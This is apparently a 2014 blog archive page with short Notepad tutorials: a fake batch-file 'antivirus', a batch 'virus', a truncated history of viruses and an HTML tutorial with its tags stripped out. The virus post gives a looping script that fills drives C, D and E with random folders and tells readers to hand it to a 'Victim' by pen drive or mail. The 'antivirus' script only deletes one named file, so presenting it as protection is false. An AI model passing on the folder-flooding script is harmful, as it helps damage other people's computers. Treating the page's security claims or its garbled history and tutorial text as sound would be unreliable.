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Showing posts from February, 2014

How To Create a Antivirus with notepad?

The main functioning of Antivirus is to detect and remove harmful or unwanted files which may slowdown your computer and windows. But if you don’t have enough time to download any best antivirus. Then simply use this trick to make your own antivirus. This antivirus scan by using command prompt and delete unwanted files automatically. Open your Notepad and paste this given code  @echo off title Antivirus echo Antivirus echo created by your name :start IF EXIST virus.bat goto infected IF NOT EXIST virus.bat goto clean cd C:\Windows\system32 :infected echo WARNING VIRUS DETECTED! del virus.bat pause goto start :clean echo System secure! pause exit Now save your file with softwareforfre.bat and select “All files”

Make A Simple Virus in Notepad

Here we are going to show, How to make Simple Virus in notepad.  We will Create a Virus  We will Check it on Victims Computer.    [ Note : Don't try it on your computer ]   Open Notepad and Copy the Following code in Notepad. Open your notepad from [Start >> Run >> Type "Notepad" >>Press Enter ] Copy the Following Code and paste it in notepad then Save it as "virus.bat". [you can also save with different name but extension must be .bat] @echo off :VIRUS cd /d C: md %RANDOM% cd /d D: md %RANDOM% cd /d E: md %RANDOM% goto VIRUS REM ####################### REM Give it to Victim   Now Give this file to Victim via Pen-drive or Mail then ask to Open it. It will Create More Folder in C,D,and E drive.

What Is Virus?

Virus               A software program first written Rich Skrenta in 1982 who was a 15-year old high school student. Known as The Elk Cloner this virus spread to other computers by monitoring the floppy drive and copying itself to any floppy diskette that was inserted into the computer. Once a floppy diskette became infected it would infect all other computers that disk was inserted into, each computer that was infected would then infect every floppy diskette inserted into it. A computer that was infected would also display a short poem on every 50th boot. The concept of a computer program capable of reproducing itself was first mentioned by John von Neumann in his 1949 "Theory of self-reproducing automata" essay. Later, Fred Cohen in 1983 later coined the term virus in a 1984 research paper as "a computer program that can affect other computer programs by modifying them in such a way as to include a (possibl...

Create a Simple Webpage Using Notepad

Webpages. We use them every day. But how hard is it to make a webpage? You can make a simple webpage easily with Notepad   Open Notepad. Click File->Save As. Choose all files from the file type menu. Save your file as file.html You can replace file with anything. Usually the main page of a website is index.html Now you can start coding. Don't worry, it's not hard!   HTML (hypertext markup language) uses tags. Tags are basically some text inside of You will use a variety of tags to create your webpage. There are also "end tags" which look like These end things like a bold font.   The first tag of a webpage is usually the html. You can put this at the top of your Notepad file.     The next tag is the tag. Between the and tags are the title tag, which tells the browser what to put at the top of the window, and meta tags, which tell search engines like Google what the site is about. On the next line after your tag, put a Now...